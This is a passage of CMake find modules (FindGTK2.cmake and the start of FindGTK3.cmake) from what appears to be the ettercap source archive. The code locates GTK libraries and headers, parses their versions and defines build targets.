${_var} )") endif() string(TOLOWER "${_var}" _basename) if(TARGET GTK2::${_basename}) foreach(_include ${ARGN}) set_property(TARGET GTK2::${_basename} APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES "${_include}") endforeach() endif() endfunction() #============================================================= # _gtk2_add_target # Internal function to create targets for GTK2 # _var = target to create #============================================================= function(_gtk2_add_target _var) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_gtk2_add_target( ${_var} )") endif() string(TOLOWER "${_var}" _basename) cmake_parse_arguments(_${_var} "" "" "GTK2_DEPENDS;GTK2_OPTIONAL_DEPENDS;OPTIONAL_INCLUDES" ${ARGN}) if(GTK2_${_var}_FOUND) if(NOT TARGET GTK2::${_basename}) # Do not create the target if dependencies are missing foreach(_dep ${_${_var}_GTK2_DEPENDS}) if(NOT TARGET GTK2::${_dep}) return() endif() endforeach() add_library(GTK2::${_basename} UNKNOWN IMPORTED) if(GTK2_${_var}_LIBRARY_RELEASE) set_property(TARGET GTK2::${_basename} APPEND PROPERTY IMPORTED_CONFIGURATIONS RELEASE) set_property(TARGET GTK2::${_basename} PROPERTY IMPORTED_LOCATION_RELEASE "${GTK2_${_var}_LIBRARY_RELEASE}") endif() if(GTK2_${_var}_LIBRARY_DEBUG) set_property(TARGET GTK2::${_basename} APPEND PROPERTY IMPORTED_CONFIGURATIONS DEBUG) set_property(TARGET GTK2::${_basename} PROPERTY IMPORTED_LOCATION_DEBUG "${GTK2_${_var}_LIBRARY_DEBUG}") endif() if(GTK2_${_var}_INCLUDE_DIR) set_property(TARGET GTK2::${_basename} APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES "${GTK2_${_var}_INCLUDE_DIR}") endif() if(GTK2_${_var}CONFIG_INCLUDE_DIR AND NOT "x${GTK2_${_var}CONFIG_INCLUDE_DIR}" STREQUAL "x${GTK2_${_var}_INCLUDE_DIR}") set_property(TARGET GTK2::${_basename} APPEND PROPERTY INTERFACE_INCLUDE_DIRECTORIES "${GTK2_${_var}CONFIG_INCLUDE_DIR}") endif() if(GTK2_DEFINITIONS) set_property(TARGET GTK2::${_basename} PROPERTY INTERFACE_COMPILE_DEFINITIONS "${GTK2_DEFINITIONS}") endif() if(_${_var}_GTK2_DEPENDS) _gtk2_add_target_depends(${_var} ${_${_var}_GTK2_DEPENDS} ${_${_var}_GTK2_OPTIONAL_DEPENDS}) endif() if(_${_var}_OPTIONAL_INCLUDES) foreach(_D ${_${_var}_OPTIONAL_INCLUDES}) if(_D) _gtk2_add_target_include_dirs(${_var} ${_D}) endif() endforeach() endif() endif() set(GTK2_TARGETS ${GTK2_TARGETS} GTK2::${_basename}) set(GTK2_TARGETS ${GTK2_TARGETS} PARENT_SCOPE) if(GTK2_USE_IMPORTED_TARGETS) set(GTK2_${_var}_LIBRARY GTK2::${_basename} PARENT_SCOPE) endif() endif() endfunction() #============================================================= # # main() # set(GTK2_FOUND) set(GTK2_INCLUDE_DIRS) set(GTK2_LIBRARIES) set(GTK2_TARGETS) set(GTK2_DEFINITIONS) if(NOT GTK2_FIND_COMPONENTS) # Assume they only want GTK set(GTK2_FIND_COMPONENTS gtk) endif() # # If specified, enforce version number # if(GTK2_FIND_VERSION) set(GTK2_FAILED_VERSION_CHECK true) if(GTK2_DEBUG) message(STATUS "[FindGTK2.cmake:${CMAKE_CURRENT_LIST_LINE}] " "Searching for version ${GTK2_FIND_VERSION}") endif() _gtk2_find_include_dir(GTK gtk/gtk.h) if(GTK2_GTK_INCLUDE_DIR) _gtk2_get_version(GTK2_MAJOR_VERSION GTK2_MINOR_VERSION GTK2_PATCH_VERSION ${GTK2_GTK_INCLUDE_DIR}/gtk/gtkversion.h) set(GTK2_VERSION ${GTK2_MAJOR_VERSION}.${GTK2_MINOR_VERSION}.${GTK2_PATCH_VERSION}) if(GTK2_FIND_VERSION_EXACT) if(GTK2_VERSION VERSION_EQUAL GTK2_FIND_VERSION) set(GTK2_FAILED_VERSION_CHECK false) endif() else() if(GTK2_VERSION VERSION_EQUAL GTK2_FIND_VERSION OR GTK2_VERSION VERSION_GREATER GTK2_FIND_VERSION) set(GTK2_FAILED_VERSION_CHECK false) endif() endif() else() # If we can't find the GTK include dir, we can't do version checking if(GTK2_FIND_REQUIRED AND NOT GTK2_FIND_QUIETLY) message(FATAL_ERROR "Could not find GTK2 include directory") endif() return() endif() if(GTK2_FAILED_VERSION_CHECK) if(GTK2_FIND_REQUIRED AND NOT GTK2_FIND_QUIETLY) if(GTK2_FIND_VERSION_EXACT) message(FATAL_ERROR "GTK2 version check failed. Version ${GTK2_VERSION} was found, version ${GTK2_FIND_VERSION} is needed exactly.") else() message(FATAL_ERROR "GTK2 version check failed. Version ${GTK2_VERSION} was found, at least version ${GTK2_FIND_VERSION} is required") endif() endif() # If the version check fails, exit out of the module here return() endif() endif() # # On MSVC, according to https://wiki.gnome.org/gtkmm/MSWindows, the /vd2 flag needs to be # passed to the compiler in order to use gtkmm # if(MSVC) foreach(_GTK2_component ${GTK2_FIND_COMPONENTS}) if(_GTK2_component STREQUAL "gtkmm") set(GTK2_DEFINITIONS "/vd2") elseif(_GTK2_component STREQUAL "glademm") set(GTK2_DEFINITIONS "/vd2") endif() endforeach() endif() # # Find all components # find_package(Freetype QUIET) if(FREETYPE_INCLUDE_DIR_ft2build AND FREETYPE_INCLUDE_DIR_freetype2) list(APPEND GTK2_INCLUDE_DIRS ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2}) endif() foreach(_GTK2_component ${GTK2_FIND_COMPONENTS}) if(_GTK2_component STREQUAL "gtk") # Left for compatibility with previous versions. _gtk2_find_include_dir(FONTCONFIG fontconfig/fontconfig.h) _gtk2_find_include_dir(X11 X11/Xlib.h) _gtk2_find_include_dir(GLIB glib.h) _gtk2_find_include_dir(GLIBCONFIG glibconfig.h) _gtk2_find_library(GLIB glib false true) _gtk2_add_target(GLIB) _gtk2_find_include_dir(GOBJECT glib-object.h) _gtk2_find_library(GOBJECT gobject false true) _gtk2_add_target(GOBJECT GTK2_DEPENDS glib) _gtk2_find_include_dir(ATK atk/atk.h) _gtk2_find_library(ATK atk false true) _gtk2_add_target(ATK GTK2_DEPENDS gobject glib) _gtk2_find_library(GIO gio false true) _gtk2_add_target(GIO GTK2_DEPENDS gobject glib) _gtk2_find_library(GTHREAD gthread false true) _gtk2_add_target(GTHREAD GTK2_DEPENDS glib) _gtk2_find_library(GMODULE gmodule false true) _gtk2_add_target(GMODULE GTK2_DEPENDS glib) _gtk2_find_include_dir(GDK_PIXBUF gdk-pixbuf/gdk-pixbuf.h) _gtk2_find_library(GDK_PIXBUF gdk_pixbuf false true) _gtk2_add_target(GDK_PIXBUF GTK2_DEPENDS gobject glib) _gtk2_find_include_dir(CAIRO cairo.h) _gtk2_find_library(CAIRO cairo false false) _gtk2_add_target(CAIRO) _gtk2_find_include_dir(PANGO pango/pango.h) _gtk2_find_library(PANGO pango false true) _gtk2_add_target(PANGO GTK2_DEPENDS gobject glib) _gtk2_find_include_dir(HARFBUZZ hb.h) _gtk2_find_library(PANGOCAIRO pangocairo false true) _gtk2_add_target(PANGOCAIRO GTK2_DEPENDS pango cairo gobject glib) _gtk2_find_library(PANGOFT2 pangoft2 false true) _gtk2_add_target(PANGOFT2 GTK2_DEPENDS pango gobject glib OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) _gtk2_find_library(PANGOXFT pangoxft false true) _gtk2_add_target(PANGOXFT GTK2_DEPENDS pangoft2 pango gobject glib OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) _gtk2_find_include_dir(GDK gdk/gdk.h) _gtk2_find_include_dir(GDKCONFIG gdkconfig.h) if(UNIX) if(APPLE) _gtk2_find_library(GDK gdk-quartz false true) endif() _gtk2_find_library(GDK gdk-x11 false true) else() _gtk2_find_library(GDK gdk-win32 false true) endif() _gtk2_add_target(GDK GTK2_DEPENDS pango gdk_pixbuf gobject glib GTK2_OPTIONAL_DEPENDS pangocairo cairo) _gtk2_find_include_dir(GTK gtk/gtk.h) if(UNIX) if(APPLE) _gtk2_find_library(GTK gtk-quartz false true) endif() _gtk2_find_library(GTK gtk-x11 false true) else() _gtk2_find_library(GTK gtk-win32 false true) endif() _gtk2_add_target(GTK GTK2_DEPENDS gdk atk pangoft2 pango gdk_pixbuf gthread gobject glib GTK2_OPTIONAL_DEPENDS gio pangocairo cairo) elseif(_GTK2_component STREQUAL "gtkmm") _gtk2_find_include_dir(SIGC++ sigc++/sigc++.h) _gtk2_find_include_dir(SIGC++CONFIG sigc++config.h) _gtk2_find_library(SIGC++ sigc true true) _gtk2_add_target(SIGC++) # Since sigc++ 2.5.1 c++11 support is required if(GTK2_SIGC++CONFIG_INCLUDE_DIR) _gtk2_sigcxx_get_version(GTK2_SIGC++_VERSION_MAJOR GTK2_SIGC++_VERSION_MINOR GTK2_SIGC++_VERSION_MICRO ${GTK2_SIGC++CONFIG_INCLUDE_DIR}/sigc++config.h) if(NOT ${GTK2_SIGC++_VERSION_MAJOR}.${GTK2_SIGC++_VERSION_MINOR}.${GTK2_SIGC++_VERSION_MICRO} VERSION_LESS 2.5.1) # These are the features needed by clients in order to include the # project headers: set_property(TARGET GTK2::sigc++ PROPERTY INTERFACE_COMPILE_FEATURES cxx_alias_templates cxx_auto_type cxx_decltype cxx_deleted_functions cxx_noexcept cxx_nullptr cxx_right_angle_brackets cxx_rvalue_references cxx_variadic_templates) endif() endif() _gtk2_find_include_dir(GLIBMM glibmm.h) _gtk2_find_include_dir(GLIBMMCONFIG glibmmconfig.h) _gtk2_find_library(GLIBMM glibmm true true) _gtk2_add_target(GLIBMM GTK2_DEPENDS gobject sigc++ glib) _gtk2_find_include_dir(GIOMM giomm.h) _gtk2_find_include_dir(GIOMMCONFIG giommconfig.h) _gtk2_find_library(GIOMM giomm true true) _gtk2_add_target(GIOMM GTK2_DEPENDS gio glibmm gobject sigc++ glib) _gtk2_find_include_dir(ATKMM atkmm.h) _gtk2_find_library(ATKMM atkmm true true) _gtk2_add_target(ATKMM GTK2_DEPENDS atk glibmm gobject sigc++ glib) _gtk2_find_include_dir(CAIROMM cairomm/cairomm.h) _gtk2_find_include_dir(CAIROMMCONFIG cairommconfig.h) _gtk2_find_library(CAIROMM cairomm true true) _gtk2_add_target(CAIROMM GTK2_DEPENDS cairo sigc++ OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) _gtk2_find_include_dir(PANGOMM pangomm.h) _gtk2_find_include_dir(PANGOMMCONFIG pangommconfig.h) _gtk2_find_library(PANGOMM pangomm true true) _gtk2_add_target(PANGOMM GTK2_DEPENDS glibmm sigc++ pango gobject glib GTK2_OPTIONAL_DEPENDS cairomm pangocairo cairo OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) _gtk2_find_include_dir(GDKMM gdkmm.h) _gtk2_find_include_dir(GDKMMCONFIG gdkmmconfig.h) _gtk2_find_library(GDKMM gdkmm true true) _gtk2_add_target(GDKMM GTK2_DEPENDS pangomm gtk glibmm sigc++ gdk atk pangoft2 gdk_pixbuf pango gobject glib GTK2_OPTIONAL_DEPENDS giomm cairomm gio pangocairo cairo OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) _gtk2_find_include_dir(GTKMM gtkmm.h) _gtk2_find_include_dir(GTKMMCONFIG gtkmmconfig.h) _gtk2_find_library(GTKMM gtkmm true true) _gtk2_add_target(GTKMM GTK2_DEPENDS atkmm gdkmm pangomm gtk glibmm sigc++ gdk atk pangoft2 gdk_pixbuf pango gthread gobject glib GTK2_OPTIONAL_DEPENDS giomm cairomm gio pangocairo cairo OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) elseif(_GTK2_component STREQUAL "glade") _gtk2_find_include_dir(GLADE glade/glade.h) _gtk2_find_library(GLADE glade false true) _gtk2_add_target(GLADE GTK2_DEPENDS gtk gdk atk gio pangoft2 gdk_pixbuf pango gobject glib GTK2_OPTIONAL_DEPENDS pangocairo cairo OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) elseif(_GTK2_component STREQUAL "glademm") _gtk2_find_include_dir(GLADEMM libglademm.h) _gtk2_find_include_dir(GLADEMMCONFIG libglademmconfig.h) _gtk2_find_library(GLADEMM glademm true true) _gtk2_add_target(GLADEMM GTK2_DEPENDS gtkmm glade atkmm gdkmm giomm pangomm glibmm sigc++ gtk gdk atk pangoft2 gdk_pixbuf pango gthread gobject glib GTK2_OPTIONAL_DEPENDS giomm cairomm gio pangocairo cairo OPTIONAL_INCLUDES ${FREETYPE_INCLUDE_DIR_ft2build} ${FREETYPE_INCLUDE_DIR_freetype2} ${GTK2_FONTCONFIG_INCLUDE_DIR} ${GTK2_X11_INCLUDE_DIR}) else() message(FATAL_ERROR "Unknown GTK2 component ${_component}") endif() endforeach() # # Solve for the GTK2 version if we haven't already # if(NOT GTK2_FIND_VERSION AND GTK2_GTK_INCLUDE_DIR) _gtk2_get_version(GTK2_MAJOR_VERSION GTK2_MINOR_VERSION GTK2_PATCH_VERSION ${GTK2_GTK_INCLUDE_DIR}/gtk/gtkversion.h) set(GTK2_VERSION ${GTK2_MAJOR_VERSION}.${GTK2_MINOR_VERSION}.${GTK2_PATCH_VERSION}) endif() # # Try to enforce components # set(_GTK2_did_we_find_everything true) # This gets set to GTK2_FOUND include(FindPackageHandleStandardArgs) #include(${CMAKE_CURRENT_LIST_DIR}/FindPackageHandleStandardArgs.cmake) foreach(_GTK2_component ${GTK2_FIND_COMPONENTS}) string(TOUPPER ${_GTK2_component} _COMPONENT_UPPER) set(GTK2_${_COMPONENT_UPPER}_FIND_QUIETLY ${GTK2_FIND_QUIETLY}) if(_GTK2_component STREQUAL "gtk") find_package_handle_standard_args(GTK2_${_COMPONENT_UPPER} "Some or all of the gtk libraries were not found." GTK2_GTK_LIBRARY GTK2_GTK_INCLUDE_DIR GTK2_GDK_INCLUDE_DIR GTK2_GDKCONFIG_INCLUDE_DIR GTK2_GDK_LIBRARY GTK2_GLIB_INCLUDE_DIR GTK2_GLIBCONFIG_INCLUDE_DIR GTK2_GLIB_LIBRARY ) elseif(_GTK2_component STREQUAL "gtkmm") find_package_handle_standard_args(GTK2_${_COMPONENT_UPPER} "Some or all of the gtkmm libraries were not found." GTK2_GTKMM_LIBRARY GTK2_GTKMM_INCLUDE_DIR GTK2_GTKMMCONFIG_INCLUDE_DIR GTK2_GDKMM_INCLUDE_DIR GTK2_GDKMMCONFIG_INCLUDE_DIR GTK2_GDKMM_LIBRARY GTK2_GLIBMM_INCLUDE_DIR GTK2_GLIBMMCONFIG_INCLUDE_DIR GTK2_GLIBMM_LIBRARY FREETYPE_INCLUDE_DIR_ft2build FREETYPE_INCLUDE_DIR_freetype2 ) elseif(_GTK2_component STREQUAL "glade") find_package_handle_standard_args(GTK2_${_COMPONENT_UPPER} "The glade library was not found." GTK2_GLADE_LIBRARY GTK2_GLADE_INCLUDE_DIR ) elseif(_GTK2_component STREQUAL "glademm") find_package_handle_standard_args(GTK2_${_COMPONENT_UPPER} "The glademm library was not found." GTK2_GLADEMM_LIBRARY GTK2_GLADEMM_INCLUDE_DIR GTK2_GLADEMMCONFIG_INCLUDE_DIR ) endif() if(NOT GTK2_${_COMPONENT_UPPER}_FOUND) set(_GTK2_did_we_find_everything false) endif() endforeach() if(GTK2_USE_IMPORTED_TARGETS) set(GTK2_LIBRARIES ${GTK2_TARGETS}) endif() if(_GTK2_did_we_find_everything AND NOT GTK2_VERSION_CHECK_FAILED) set(GTK2_FOUND true) else() # Unset our variables. set(GTK2_FOUND false) set(GTK2_VERSION) set(GTK2_VERSION_MAJOR) set(GTK2_VERSION_MINOR) set(GTK2_VERSION_PATCH) set(GTK2_INCLUDE_DIRS) set(GTK2_LIBRARIES) set(GTK2_TARGETS) set(GTK2_DEFINITIONS) endif() if(GTK2_INCLUDE_DIRS) list(REMOVE_DUPLICATES GTK2_INCLUDE_DIRS) endif() ettercap-0.8.3.1/cmake/Modules/FindGTK3.cmake000664 000000 000000 00000045717 13711276346 020503 0ustar00rootroot000000 000000 # - FindGTK3.cmake # This module can find the GTK3 widget libraries and several of its other # optional components like gtkmm, glade, and glademm. # # NOTE: If you intend to use version checking, CMake 2.6.2 or later is # required. # # Specify one or more of the following components # as you call this find module. See example below. # # gtk # gtkmm # glade # glademm # # The following variables will be defined for your use # # GTK3_FOUND - Were all of your specified components found? # GTK3_INCLUDE_DIRS - All include directories # GTK3_LIBRARIES - All libraries # # GTK3_VERSION - The version of GTK3 found (x.y.z) # GTK3_MAJOR_VERSION - The major version of GTK3 # GTK3_MINOR_VERSION - The minor version of GTK3 # GTK3_PATCH_VERSION - The patch version of GTK3 # # Optional variables you can define prior to calling this module: # # GTK3_DEBUG - Enables verbose debugging of the module # GTK3_SKIP_MARK_AS_ADVANCED - Disable marking cache variables as advanced # GTK3_ADDITIONAL_SUFFIXES - Allows defining additional directories to # search for include files # #================= # Example Usage: # # Call find_package() once, here are some examples to pick from: # # Require GTK 3.0 or later # find_package(GTK3 3.0 REQUIRED gtk) # # if(GTK3_FOUND) # include_directories(${GTK3_INCLUDE_DIRS}) # add_executable(mygui mygui.cc) # target_link_libraries(mygui ${GTK3_LIBRARIES}) # endif() # #============================================================================= # Copyright 2009 Kitware, Inc. # Copyright 2008-2009 Philip Lowman # Copyright 2014-2018 Ettercap Development Team # # Distributed under the OSI-approved BSD License (the "License"); # see accompanying file Copyright.txt for details. # # This software is distributed WITHOUT ANY WARRANTY; without even the # implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the License for more information. #============================================================================= # (To distribute this file outside of CMake, substitute the full # License text for the above reference.) # Version 0.1 (5/13/2011) # * First cut at a GTK3 version (Heavily derived from # FindGTK2.cmake) # Version 0.2 (3/02/2018) # * Run git diff against this file to see all changes #============================================================= # _GTK3_GET_VERSION # Internal function to parse the version number in gtkversion.h # _OUT_major = Major version number # _OUT_minor = Minor version number # _OUT_micro = Micro version number # _gtkversion_hdr = Header file to parse #============================================================= function(_GTK3_GET_VERSION _OUT_major _OUT_minor _OUT_micro _gtkversion_hdr) file(READ ${_gtkversion_hdr} _contents) if(_contents) string(REGEX REPLACE ".*#define GTK_MAJOR_VERSION[ \t]+\\(([0-9]+)\\).*" "\\1" ${_OUT_major} "${_contents}" ) string(REGEX REPLACE ".*#define GTK_MINOR_VERSION[ \t]+\\(([0-9]+)\\).*" "\\1" ${_OUT_minor} "${_contents}" ) string(REGEX REPLACE ".*#define GTK_MICRO_VERSION[ \t]+\\(([0-9]+)\\).*" "\\1" ${_OUT_micro} "${_contents}" ) if(NOT ${_OUT_major} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for GTK3_MAJOR_VERSION!") endif() if(NOT ${_OUT_minor} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for GTK3_MINOR_VERSION!") endif() if(NOT ${_OUT_micro} MATCHES "[0-9]+") message(FATAL_ERROR "Version parsing failed for GTK3_MICRO_VERSION!") endif() set(${_OUT_major} ${${_OUT_major}} PARENT_SCOPE) set(${_OUT_minor} ${${_OUT_minor}} PARENT_SCOPE) set(${_OUT_micro} ${${_OUT_micro}} PARENT_SCOPE) else() message(FATAL_ERROR "Include file ${_gtkversion_hdr} does not exist") endif() endfunction() #============================================================= # _GTK3_FIND_INCLUDE_DIR # Internal function to find the GTK include directories # _var = variable to set # _hdr = header file to look for #============================================================= function(_GTK3_FIND_INCLUDE_DIR _var _hdr) if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_GTK3_FIND_INCLUDE_DIR( ${_var} ${_hdr} )") endif() set(_relatives # If these ever change, things will break. ${GTK3_ADDITIONAL_SUFFIXES} glibmm-2.0 glib-2.0 atk-1.0 atkmm-1.0 cairo cairomm-1.0 gdk-pixbuf-2.0 gdkmm-2.4 giomm-2.4 gtk-3.0 gtkmm-2.4 libglade-2.0 libglademm-2.4 harfbuzz pango-1.0 pangomm-1.4 sigc++-2.2 gtk-unix-print-2.0) set(_suffixes) foreach(_d ${_relatives}) list(APPEND _suffixes ${_d}) list(APPEND _suffixes ${_d}/include) # for /usr/lib/gtk-2.0/include endforeach() if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "include suffixes = ${_suffixes}") endif() find_path(${_var} ${_hdr} PATHS # On Windows, glibconfig.h is located # under $PREFIX/lib/glib-2.0/include. C:/GTK/lib/glib-2.0/include C:/msys64/$ENV{MSYSTEM}/lib/glib-2.0 # end /usr/local/lib64 /usr/local/lib # fix for Ubuntu == 11.04 (Natty Narwhal) /usr/lib/i386-linux-gnu/ /usr/lib/x86_64-linux-gnu/ # end # fix for Ubuntu >= 11.10 (Oneiric Ocelot) /usr/lib/${CMAKE_LIBRARY_ARCHITECTURE} # end /usr/lib64 /usr /opt/gnome /usr/openwin /sw /opt/local $ENV{GTKMM_BASEPATH} [HKEY_CURRENT_USER\\SOFTWARE\\gtkmm\\2.4;Path] [HKEY_LOCAL_MACHINE\\SOFTWARE\\gtkmm\\2.4;Path] PATH_SUFFIXES ${_suffixes} include lib ) if(${_var}) set(GTK3_INCLUDE_DIRS ${GTK3_INCLUDE_DIRS} ${${_var}} PARENT_SCOPE) if(NOT GTK3_SKIP_MARK_AS_ADVANCED) mark_as_advanced(${_var}) endif() endif() endfunction() #============================================================= # _GTK3_FIND_LIBRARY # Internal function to find libraries packaged with GTK3 # _var = library variable to create #============================================================= function(_GTK3_FIND_LIBRARY _var _lib _expand_vc _append_version) if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "_GTK3_FIND_LIBRARY( ${_var} ${_lib} ${_expand_vc} ${_append_version} )") endif() # Not GTK versions per se but the versions encoded into Windows # import libraries (GtkMM 2.14.1 has a gtkmm-vc80-2_4.lib for example) # Also the MSVC libraries use _ for . (this is handled below) # ********* SOMEONE WITH WINDOWS NEEDS TO CHECK THIS BIT FOR V3 ********* # ********* the plain 3 is needed to get Debian Sid to find the libraries set(_versions 3.0 3 2.20 2.18 2.16 2.14 2.12 2.10 2.8 2.6 2.4 2.2 2.0 1.20 1.18 1.16 1.14 1.12 1.10 1.8 1.6 1.4 1.2 1.0) set(_library) set(_library_d) set(_library ${_lib}) if(_expand_vc AND MSVC) # Add vc80/vc90/vc100 midfixes if(MSVC80) set(_library ${_library}-vc80) elseif(MSVC90) set(_library ${_library}-vc90) elseif(MSVC10) set(_library ${_library}-vc100) endif() set(_library_d ${_library}-d) endif() if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "After midfix addition = ${_library} and ${_library_d}") endif() set(_lib_list) set(_libd_list) if(_append_version) foreach(_ver ${_versions}) list(APPEND _lib_list "${_library}-${_ver}") list(APPEND _libd_list "${_library_d}-${_ver}") endforeach() else() set(_lib_list ${_library}) set(_libd_list ${_library_d}) endif() if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "library list = ${_lib_list} and library debug list = ${_libd_list}") endif() # For some silly reason the MSVC libraries use _ instead of . # in the version fields if(_expand_vc AND MSVC) set(_no_dots_lib_list) set(_no_dots_libd_list) foreach(_l ${_lib_list}) string(REPLACE "." "_" _no_dots_library ${_l}) list(APPEND _no_dots_lib_list ${_no_dots_library}) endforeach() # And for debug set(_no_dots_libsd_list) foreach(_l ${_libd_list}) string(REPLACE "." "_" _no_dots_libraryd ${_l}) list(APPEND _no_dots_libd_list ${_no_dots_libraryd}) endforeach() # Copy list back to original names set(_lib_list ${_no_dots_lib_list}) set(_libd_list ${_no_dots_libd_list}) endif() if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "While searching for ${_var}, our proposed library list is ${_lib_list}") endif() find_library(${_var} NAMES ${_lib_list} PATHS /opt/gnome /usr/openwin /sw $ENV{GTKMM_BASEPATH} [HKEY_CURRENT_USER\\SOFTWARE\\gtkmm\\2.4;Path] [HKEY_LOCAL_MACHINE\\SOFTWARE\\gtkmm\\2.4;Path] PATH_SUFFIXES lib lib64 ) if(_expand_vc AND MSVC) if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "While searching for ${_var}_DEBUG our proposed library list is ${_libd_list}") endif() find_library(${_var}_DEBUG NAMES ${_libd_list} PATHS $ENV{GTKMM_BASEPATH} [HKEY_CURRENT_USER\\SOFTWARE\\gtkmm\\2.4;Path] [HKEY_LOCAL_MACHINE\\SOFTWARE\\gtkmm\\2.4;Path] PATH_SUFFIXES lib ) if(${_var} AND ${_var}_DEBUG) if(NOT GTK3_SKIP_MARK_AS_ADVANCED) mark_as_advanced(${_var}_DEBUG) endif() set(GTK3_LIBRARIES ${GTK3_LIBRARIES} optimized ${${_var}} debug ${${_var}_DEBUG} ) set(GTK3_LIBRARIES ${GTK3_LIBRARIES} PARENT_SCOPE) endif() else() if(NOT GTK3_SKIP_MARK_AS_ADVANCED) mark_as_advanced(${_var}) endif() set(GTK3_LIBRARIES ${GTK3_LIBRARIES} ${${_var}}) set(GTK3_LIBRARIES ${GTK3_LIBRARIES} PARENT_SCOPE) # Set debug to release set(${_var}_DEBUG ${${_var}}) set(${_var}_DEBUG ${${_var}} PARENT_SCOPE) endif() endfunction() #============================================================= # # main() # set(GTK3_FOUND) set(GTK3_INCLUDE_DIRS) set(GTK3_LIBRARIES) if(NOT GTK3_FIND_COMPONENTS) # Assume they only want GTK set(GTK3_FIND_COMPONENTS gtk) endif() # # If not specified, enforce version number # if(GTK3_FIND_VERSION) if(NOT DEFINED CMAKE_MINIMUM_REQUIRED_VERSION) cmake_minimum_required(VERSION 2.6.2) endif() set(GTK3_FAILED_VERSION_CHECK true) if(GTK3_DEBUG) message(STATUS "[FindGTK3.cmake:${CMAKE_CURRENT_LIST_LINE}] " "Searching for version ${GTK3_FIND_VERSION}") endif() _gtk3_find_include_dir(GTK3_GTK_INCLUDE_DIR gtk/gtk.h) if(GTK3_GTK_INCLUDE_DIR) _gtk3_get_version(GTK3_MAJOR_VERSION GTK3_MINOR_VERSION GTK3_PATCH_VERSION ${GTK3_GTK_INCLUDE_DIR}/gtk/gtkversion.h) set(GTK3_VERSION ${GTK3_MAJOR_VERSION}.${GTK3_MINOR_VERSION}.${GTK3_PATCH_VERSION}) if(GTK3_FIND_VERSION_EXACT) if(GTK3_VERSION VERSION_EQUAL GTK3_FIND_VERSION) set(GTK3_FAILED_VERSION_CHECK false) endif() else() if(GTK3_VERSION VERSION_EQUAL GTK3_FIND_VERSION OR GTK3_VERSION VERSION_GREATER GTK3_FIND_VERSION) set(GTK3_FAILED_VERSION_CHECK false) endif() endif() else() # If we can't find the GTK include dir, we can't do version checking if(GTK3_FIND_REQUIRED AND NOT GTK3_FIND_QUIETLY) message(FATAL_ERROR "Could not find GTK3 include directory") endif() return() endif() if(GTK3_FAILED_VERSION_CHECK) if(GTK3_FIND_REQUIRED AND NOT GTK3_FIND_QUIETLY) if(GTK3_FIND_VERSION_EXACT) message(FATAL_ERROR "GTK3 version check failed. Version ${GTK3_VERSION} was found, \ version ${GTK3_FIND_VERSION} is needed exactly." ) else() message(FATAL_ERROR "GTK3 version check failed. Version ${GTK3_VERSION} was found, \ at least version ${GTK3_FIND_VERSION} is required" ) endif() endif() # If the version check fails, exit out of the module here return() endif() endif() # # Find all components # find_package(Freetype QUIET) list(APPEND GTK3_INCLUDE_DIRS ${FREETYPE_INCLUDE_DIRS}) list(APPEND GTK3_LIBRARIES ${FREETYPE_LIBRARIES}) foreach(_GTK3_component ${GTK3_FIND_COMPONENTS}) if(_GTK3_component STREQUAL "gtk") _gtk3_find_include_dir(GTK3_GLIB_INCLUDE_DIR glib.h) _gtk3_find_include_dir(GTK3_GLIBCONFIG_INCLUDE_DIR glibconfig.h) _gtk3_find_library(GTK3_GLIB_LIBRARY glib false true) _gtk3_find_library(GTK3_GTHREAD_LIBRARY gthread false true) _gtk3_find_include_dir(GTK3_GOBJECT_INCLUDE_DIR gobject/gobject.h) _gtk3_find_library(GTK3_GOBJECT_LIBRARY gobject false true) _gtk3_find_include_dir(GTK3_GIO_INCLUDE_DIR gio/gio.h) _gtk3_find_library(GTK3_GIO_LIBRARY gio false true) _gtk3_find_include_dir(GTK3_GDK_PIXBUF_INCLUDE_DIR gdk-pixbuf/gdk-pixbuf.h) 